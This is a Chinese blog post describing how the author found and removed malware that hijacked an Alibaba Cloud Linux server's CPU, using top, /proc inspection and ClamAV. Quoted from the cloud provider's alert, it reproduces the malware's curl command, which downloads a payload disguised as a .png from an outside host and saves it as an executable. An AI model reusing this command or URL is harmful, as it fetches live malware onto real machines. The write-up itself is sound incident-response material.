记一次阿里云linux服务器中毒处理

最新推荐文章于 2024-06-19 20:58:40 发布
最新推荐文章于 2024-06-19 20:58:40 发布
阅读量2k 收藏 5
点赞数
分类专栏: 运维 文章标签: 服务器 Linux 中毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zb408832388/article/details/103128938
版权

记一次阿里云linux服务器中毒处理

事件

阿里云告警:
您的云服务器(XXXXX)由于被检测到对外攻击,已阻断该服务器对其它服务器端口(XXX)的访问,阻断预计将在XXXXXX时间内结束,请及时进行安全自查。

登录服务器(Ubuntu 16.04.4 LTS),发现CPU满载,docker下的jekins各种重启。

定位进程

top命令,发现CPU占用很高的是一个叫migration的进程,这个进程不是我开启的。
kill -9 PID 杀掉,果然安静了。
但是没过几分钟,这个进程又起来了,看来有程序自动启动它。
ll /proc/PID 看到 exe ->/tmp/migration(deleted) ,厉害了,可执行文件居然已经被删了。
pstree -a 查看进程树,一样也没找到这个进程。
定位进程失败!

人肉筛查

kill掉migration,再打开top, 试图通过肉眼观察出有没有进程突然闪现,naive!啥也没捕获到。
kill掉migration,再iftop -PB,试图通过观察网络使用情况来发现启动进程,然并卵。

clamav

无奈,祭出查毒工具clamav,这个工具默认只查毒报警不做处理。

  1. 安装
apt-get install clamav

提示我apt-get update,于是先更新了一下

  1. 下载病毒库
freshclam
  1. 扫描并记录日志
clamscan -r /home/jekins -l /tmp/clamav.log

数个小时之后,扫描结束。log的SCAN SUMMARY中显示Infected files:2,这里坑的是log里面每个文件都输出了结果,导致很不好找,还好机智的查了一下有毒文件会标识FOUND,轻松搜到。
其实可以用命令clamscan -r --bell -i /home/jekins ,只显示有问题的文件并发出报警声。
总之,查到病毒文件是一个很深很深的目录下的两个76eb30d638ac40文件,直接删除,再kill -9 PID,到此彻底查杀了。

来源

后来查看阿里云的云安全中心预警信息,发现了2条预警,可见恶意进程和来源。

恶意进程(云查杀)-访问恶意IP待处理

进程路径:/tmp/76eb30d638ac40
命令行参数:[kthrotld]

进程异常行为-访问恶意下载源待处理
父进程路径:/bin/dash
父进程命令行:sh

URL链接:http://img.sobot.com/chatres/89/msg/20191022/78e3582c42824f17aba17feefb87ea5f.png
进程路径:/usr/bin/curl
命令行参数:curl -fsSL -m15 img.sobot.com/chatres/89/msg/20191022/78e3582c42824f17aba17feefb87ea5f.png -o 76eb30d638ac40

参考

  1. 解决阿里云服务器CUP爆满被用来当挖矿机(中病毒解决)
  2. (centos7)阿里云 ECS中毒后CPU一直占用100%的解决过程
  3. Linux通过PID查看进程完整信息
  4. linux clamav 免费查毒工具
九韭酒
关注
专栏目录
阿里云国际版云服务器Linux系统数据恢复操作步骤
九河云的创作之路
08-02 1183
底层存储的三副本提供对数据磁盘的物理层保护,但是,如果系统内部使用云盘逻辑上出现问题,例如中毒、误删数据、文件系统损坏等情况,还是可能出现数据丢失。本文介绍了Linux系统下常见的数据盘分区丢失的问题以及对应的处理方法,同时提供了使用云盘的常见误区以及最佳实践,避免可能的数据丢失风险。此时,您可以先手动挂载数据盘分区。在修复数据前,您必须先对分区丢失的数据盘创建快照,在快照创建完成后再尝试修复。在某些情况下,您可以用testdisk扫描出磁盘分区,但是无法保存分区,此时,您可以尝试直接恢复文件。...
一次阿里云木马排查过程
dreamer2020的专栏
08-07 4514
问题描述 接到阿里云报警邮件,说是一台ECS有恶意进程。查看阿里云的安全详情,发现如下情况: 登录到服务器上检查/bin目录,发现该文件确实不对,大小变成的1.1M,类似的还有netstat。如下图: 正常ubuntu系统下的ps才96K,netstat大小为117K,上述命令文件被恶意窜改了。此外,还发现启动脚本(/etc/rc1.d, /etc/rc2.d, /etc/rc3.d, /et...
(centos7)阿里云 ECS中毒后CPU一直占用100%的解决过程
Gogym的博客
05-15 6533
这两天发现部署在阿里云上的ECS服务器的CPU一直占用100%,一开始以为只是偶然的,没在意。 后面发现CPU一直满载,这不应该呀。于是赶紧看看是怎么回事。 使用 top 命令查看cpu使用情况: 发现有一个 vTtHH1 的进程占用 200%的cpu,这是什么鬼,貌似哥不曾相识啊。 于是乎,通过命令 :cd /proc/32676 -> ll 查看这到底是什么玩意,...
一次阿里云服务器中毒事件
daitu3201的博客
04-15 2421
一直使用的阿里云服务器,最近突然无法正常登录网站,同时数据库服务莫名其妙的挂掉了。 登录到服务器的后台,执行top命令,发现很多wget、python -c import urllib2 as fbi这样的命令,如下图所示: 根据CSDN山上的一篇博文:https://blog.csdn.net/zhangvalue/article/details/87928551,通过cron -l命令查...
Linux服务器挖矿病毒处理
最新发布
自己在学习过程中的总结
06-19 1801
情况说明:挖矿进程被隐藏(CPU占用50%,htop/top却看不到异常进程),结束挖矿进程后马上又会运行起来(crontab -l查看发现没有定时任务)。1.中毒表现 2.解决办法:断网并修改root密码,找出隐藏的挖矿进程,关闭病毒启动服务,杀掉挖矿进程 3. 防止黑客再次入侵:查找异常IP,封禁异常IP,查看是否有陌生公钥。中毒表现:服务器是24核的,前12核的CPU占用一直处于100%,即使重启服务器,马上就会占用12核的CPU,并且系统内存占用也很大。在没有使用软件的情况下,CPU使用率很高。
阿里云服务器中毒‘Kirito666’经历
06-20 1732
阿里云服务器中毒‘Kirito666’经历 尊敬的 xxx: 云盾云安全中心检测到您的服务器服务器出现了紧急安全事件:恶意脚本代码执行 。 早上阿里就一直给我发来这样的消息,让我一脸懵逼,当时还没想到是被黑了。(学编程,但是对于这块区域还算是小白)。 但是阿里一直提醒我,并且强行给我限制了性能。 等到我去连我服务器上的数据库时,一直断,并且非常卡顿,我的伙伴也过来问我怎么了。 这个时候我感到不对劲了(因为我一直比较相信阿里,安全方面应该没事,就觉得没什么关系)。 这个时候我打开了我的xshell。打开d
阿里云区域服务内容:网站服务器中毒了,如何处理
weixin_34397291的博客
06-01 452
好不容易做好的网站,如果服务器经常中毒,网站打不开,岂不是令人十分头疼的事情。下面,阿里云区域服务商武汉捷讯小编为大家来支招。   一:服务器是否开启防火墙   一般服务够买商对应的都会有相应的防火墙提供安全防护,需要看下是否开启,服务器个人建议还是选择阿里云,西部数码的服务器,一个是有实力,另一个是有问题能及时的维护,自己维护不了,花点钱就可以...
阿里云Linux服务器如何安装ClamAV杀毒软件-最全详细教程
歲月的孤獨
08-08 4753
阿里云Linux服务器如何安装ClamAV杀毒软件-最全详细教程 很多人说,Linux操作系统用作服务器,已是非常安全了!而阿里云开发的Linux版本,就更安全了。 装杀毒软件是多此一举!福州WSEO网络营销工作室的创始人张开辉认为,安装ClamAV杀毒软件,是否有必要,要看针对什么网站程序!像我喜欢Wordpress建站的站长来讲,是非常有必要的。即使是自己的服务器,也要偶尔杀毒一下,看是否安全...
root账号无法通过SSH登录阿里云ECS
weixin_46535326的博客
02-28 1286
root账号无法通过SSH登录阿里云ECS 问题描述 通过SSH远程登录Linux系统的ECS实例时,连接失败,无法正常登录Linux实例。 问题原因 下图为SSH远程登录的关联因素示意图,由此可见,SSH远程登录失败的可能原因较多。为定位具体的问题原因,请参见解决方案。 解决方案 如果您对实例或数据有修改、变更等风险操作,务必注意实例的容灾、容错能力,确保数据安全。 如果您对实例(包括但不限于ECS、RDS)等进行配置与数据修改,建议提前创建快照或开启RDS日志备份等功能。 如果您在阿里云平台授权或者提
linux服务器CPU占用50%,top/htop/ps却看不到异常进程?本文带你彻底杀毒!
weixin_43693967的博客
11-23 4748
htop发现前32个核全被占满了,但是却找不到对应进程号发现CPU占用3143.28%,因为是32核,平均每核就是接近100%
腾讯云-服务违规封禁提醒解决
u011218356的博客
07-26 5100
腾讯云服务-违规封禁提醒问题解决
关于“云服务器被检测到对外攻击已阻断该服务器对其它服务器端口的访问“的解决措施
风清无际
07-05 2334
前段时间阿里云大量发送云服务器对外攻击的信息到邮箱中,邮件信息大概如下: 您的云服务器(XX.XX.XX.XX)由于被检测到对外攻击,已阻断该服务器对其它服务器端口(TCP:XX)的访问,阻断预计将在2019-01-12 18:57:08时间内结束,请及时进行安全自查。若有疑问,请工单或电话联系阿里云售后,感谢您对阿里云的支持。 您的云服务器(XX.XX.XX.XX)已解除端口:(TCP:XX)的访问相关拦截处罚。 若有疑问,请工单或电话联系阿里云售后,感谢您对阿里云的支持。 以上信息描述的比较清楚,
恶意进程(云查杀)-DDOS木马
weixin_43200106的博客
06-10 3528
一、 恶意文件路径:/lib/libsys 恶意文件md5:90f06c70846f5570a32bc51a194a72c0 描述:黑客在入侵系统后植入的恶意程序,会占用您的带宽攻击其他服务器,同时可能影响自身业务的正常运行,危害较大。 此类恶意程序可能还存在自删除行为,或伪装成系统程序以躲避检测。如果发现该文件不存在,请检查是否存在可疑进程、定时任务或启动项。帮助文档:https://he...
由于被检测到对外攻击,已阻断该服务器对其它服务器端口(TCP:6379)的访问
BoomMan
02-21 6231
由于被检测到对外攻击,已阻断该服务器对其它服务器端口(TCP:6379)的访问
阿里云被肉鸡的破解方法
PHP开发
05-20 7299
5.19号收到阿里云的短信提醒:尊敬的用户,您的云服务器(xxx.xxx.xxx.xxx)存在对外ddos攻击,或已被入侵,会造成您的服务器宕机或者数据泄露。xxxxxxx 5.19号当天我登录服务器查看可疑进程,没有所获。更改了云服务器的密码,包含了大小写,特殊字符 5.20号又收到短信提醒,和5.19号短信一样,仍然存在入侵。 登录阿里云,查看cpu使用率为100%,ps
阿里云ECS——[您的云服务器(xxx.xxx.xxx.xxx)由于被检测到对外攻击,已阻断该服务器对其它服务器端口(TCP:6379)的访问]解决方案
无限迭代中......
04-16 2047
邮件通知 安全警告 事件调查 风险预估 沦为肉鸡 挖矿等病毒:占用CPU、内存 攻击方式 通过无密码或者弱密码的Redis服务的6379端口,利用SSRF漏洞进行攻击。 SSRF漏洞:https://blog.csdn.net/qq_43431158/article/details/103169502 处理方案 清除病毒 查看运行状态 top 杀...
您的云服务器(116.62.128.176)由于被检测到对外攻击,已阻断该服务器对其它--(redis漏洞引起的问题)
zxc_user的博客
01-27 9097
转载自 http://www.cnblogs.com/cxygg/p/9967602.html   https://blog.csdn.net/pri_sta_pub/article/details/85340922 https://www.jb51.net/article/147365.htm   得还要删除对应的文件,一般都存在于 rm -rf /tmp/qW3xT.4   ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值